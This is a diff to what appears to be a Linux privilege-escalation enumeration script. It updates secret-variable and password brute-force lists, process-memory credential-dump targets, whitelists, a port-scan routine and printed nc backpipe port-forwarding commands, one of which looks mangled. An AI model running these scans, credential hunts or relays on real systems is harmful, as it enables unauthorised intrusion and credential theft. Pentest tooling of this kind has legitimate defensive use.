L|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET" @@ -486,7 +489,7 @@ andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana s plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" PASSTRY="2000" #Default num of passwds to try (all by default) -if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this +if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this SEDOVERFLOW=true for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do wgroups="$wgroups -group $grp -or " @@ -521,33 +524,34 @@ notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$| TIMEOUT="$(command -v timeout 2>/dev/null)" STRACE="$(command -v strace 2>/dev/null)" STRINGS="$(command -v strings 2>/dev/null)" +LDD="$(command -v ldd 2>/dev/null)" +READELF="$(command -v readelf 2>/dev/null)" shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" notBackup="/tdbbackup$|/db_hotbackup$" -cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|" +cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|mod-pagespeed|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|" cronjobsB="centreon" processesVB='jdwp|tmux |screen | inspect |--inspect[= ]|--inspect$|--inpect-brk|--remote-debugging-port' -processesB="knockd|splunk" +processesB="amazon-ssm-agent|knockd|splunk" processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:" mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier" -profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" +profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|im-config_wayland.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" -timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|dpkg-db-backup.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" -dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" - +dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.intel.tss2.Tabrmd|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|net.hadess.SwitcherooControl|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.nm_priv_helper|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.SystemToolsBackends|org.freedesktop.SystemToolsBackends.[a-zA-Z0-9_]+|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.gnome.DisplayManager|org.opensuse.CupsPkHelper.Mechanism" USEFUL_SOFTWARE="authbind aws base64 ctr curl doas docker fetch g++ gcc gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm" TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion" @@ -693,6 +697,7 @@ print_3title(){ } print_3title_no_nl(){ + echo -ne "\033[2K\r" printf ${BLUE}"\r══╣ $GREEN${1}..."$NC #There are 2 "═" } @@ -859,7 +864,7 @@ tcp_port_scan (){ if [ -z "$PORTS" ]; then printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " printf "$NC\n" - PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" + PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" else PORTS="$(echo $PORTS | tr ',' ' ')" printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " @@ -868,7 +873,7 @@ tcp_port_scan (){ for port in $PORTS; do if [ "$FOUND_BASH" ]; then - $FOUND_BASH -c "(echo /dev/null && echo -e \"\n[+] Open port at: $IP:$port\"" & + $FOUND_BASH -c "(echo /dev/null && echo -n \"[+] Open port at: $IP:$port\"" & elif [ "$NC_SCAN" ]; then ($NC_SCAN "$IP" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & fi @@ -964,15 +969,14 @@ port_forward (){ REMOTE_IP=$3 REMOTE_PORT=$4 - echo "In your local machine execute:" + echo "In your machine execute:" echo "cd /tmp; rm backpipe; mknod backpipe p;" echo "nc -lvnp $LOCAL_PORT 0backpipe" echo "" - echo "Press any key when 